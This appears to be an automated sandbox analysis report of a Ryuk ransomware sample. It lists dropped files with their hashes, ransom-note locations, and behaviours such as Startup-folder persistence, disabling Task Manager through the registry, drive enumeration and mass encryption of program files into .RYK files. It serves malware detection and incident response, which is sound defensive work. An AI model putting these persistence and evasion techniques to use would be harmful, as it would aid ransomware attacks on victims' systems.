SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\ProgramData\hrmlog1

MD5 d6cd0b92c8abd1860f90d7e87c514762
SHA1 5ea5b0232ba3be9223bb4f5af2df0e521e593dc9
SHA256 05360af7438a01f7b221d9a502a36ded85b1add6ee16ac8bd630f0285ccb87f7
SHA512 6dc1c6156f6caa49b4282b6a47ff85761eb4005d5780fbed26009de062ed1a1649f6abbe1ed7a8de9accebabb1ca06ecee88fd4501ea8188ba4112d9917e01cc

C:\ProgramData\hrmlog1

MD5 d6cd0b92c8abd1860f90d7e87c514762
SHA1 5ea5b0232ba3be9223bb4f5af2df0e521e593dc9
SHA256 05360af7438a01f7b221d9a502a36ded85b1add6ee16ac8bd630f0285ccb87f7
SHA512 6dc1c6156f6caa49b4282b6a47ff85761eb4005d5780fbed26009de062ed1a1649f6abbe1ed7a8de9accebabb1ca06ecee88fd4501ea8188ba4112d9917e01cc

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 d6cd0b92c8abd1860f90d7e87c514762
SHA1 5ea5b0232ba3be9223bb4f5af2df0e521e593dc9
SHA256 05360af7438a01f7b221d9a502a36ded85b1add6ee16ac8bd630f0285ccb87f7
SHA512 6dc1c6156f6caa49b4282b6a47ff85761eb4005d5780fbed26009de062ed1a1649f6abbe1ed7a8de9accebabb1ca06ecee88fd4501ea8188ba4112d9917e01cc

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 e63c2c84697311db5692274b4c56526c
SHA1 81553580f8d75aedef95a0b194ae239f8a73549c
SHA256 48a443b75dbda9221eed49395ec6b5a1b2963679faf64c682d6e73c5c6ca5195
SHA512 e75db94b6890a453cd8e3571d52dae2209b990bfb6f40544c08da5f9753c8cb1d07ee20d3723870a7581e4900933d8959bc44bcd852b855497f305545077006a

C:\ProgramData\hrmlog2

MD5 e63c2c84697311db5692274b4c56526c
SHA1 81553580f8d75aedef95a0b194ae239f8a73549c
SHA256 48a443b75dbda9221eed49395ec6b5a1b2963679faf64c682d6e73c5c6ca5195
SHA512 e75db94b6890a453cd8e3571d52dae2209b990bfb6f40544c08da5f9753c8cb1d07ee20d3723870a7581e4900933d8959bc44bcd852b855497f305545077006a

C:\ProgramData\hrmlog2

MD5 e63c2c84697311db5692274b4c56526c
SHA1 81553580f8d75aedef95a0b194ae239f8a73549c
SHA256 48a443b75dbda9221eed49395ec6b5a1b2963679faf64c682d6e73c5c6ca5195
SHA512 e75db94b6890a453cd8e3571d52dae2209b990bfb6f40544c08da5f9753c8cb1d07ee20d3723870a7581e4900933d8959bc44bcd852b855497f305545077006a

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 0000a914baed0297b81d709af810d8c4
SHA1 3572da84c4efcd6f41410a2103cd7d9dbed6e28e
SHA256 1898dc5b45f41b580cd17c3ddf79d50336ef74dd104c2d297ac91b41f8585e11
SHA512 bfd8b332da9d9b4c25437ddc616ea7a8a919df13b104c006c3ae49a5d7d2c36098b651324fc4fc9aa2976ae9e28a2f892c1bf0290b7d6083f9ccd041c9b4224f

C:\ProgramData\RYUKID

MD5 0000a914baed0297b81d709af810d8c4
SHA1 3572da84c4efcd6f41410a2103cd7d9dbed6e28e
SHA256 1898dc5b45f41b580cd17c3ddf79d50336ef74dd104c2d297ac91b41f8585e11
SHA512 bfd8b332da9d9b4c25437ddc616ea7a8a919df13b104c006c3ae49a5d7d2c36098b651324fc4fc9aa2976ae9e28a2f892c1bf0290b7d6083f9ccd041c9b4224f

C:\ProgramData\hrmlog2

MD5 e63c2c84697311db5692274b4c56526c
SHA1 81553580f8d75aedef95a0b194ae239f8a73549c
SHA256 48a443b75dbda9221eed49395ec6b5a1b2963679faf64c682d6e73c5c6ca5195
SHA512 e75db94b6890a453cd8e3571d52dae2209b990bfb6f40544c08da5f9753c8cb1d07ee20d3723870a7581e4900933d8959bc44bcd852b855497f305545077006a

C:\ProgramData\hrmlog1

MD5 d6cd0b92c8abd1860f90d7e87c514762
SHA1 5ea5b0232ba3be9223bb4f5af2df0e521e593dc9
SHA256 05360af7438a01f7b221d9a502a36ded85b1add6ee16ac8bd630f0285ccb87f7
SHA512 6dc1c6156f6caa49b4282b6a47ff85761eb4005d5780fbed26009de062ed1a1649f6abbe1ed7a8de9accebabb1ca06ecee88fd4501ea8188ba4112d9917e01cc

C:\ProgramData\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html

MD5 a641bf8ac8307aad57ecab53872e67db
SHA1 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA256 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA512 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-11 01:49

Reported

2023-03-11 01:51

Platform

win10v2004-20230221-en

Max time kernel

151s

Max time network

112s

Command Line

"C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe"

Signatures

Ryuk

ransomware ryuk

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\wordEtw.man.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\YEAR.XSL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\MSB1XTOR.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\it-it\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXPTOOWS.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\QuizShow.potx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_es_135x40.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\iw_get.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\CENTURY.TTF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected].[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_ie8.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sql70.xsl.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\en_CA.dic.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\sa-jdi.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSYH.TTC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mk.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\LTSHYPH_EN.LEX.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOIDCLIL.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ug.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\office32ww.msi.16.x-none.tree.dat.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_retina.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_OEM_Perp-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-down.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_Subscription-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluError_136x136.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\plugin.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_fw.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Author2String.XSL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART3.BDR.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_selected_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\it_get.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
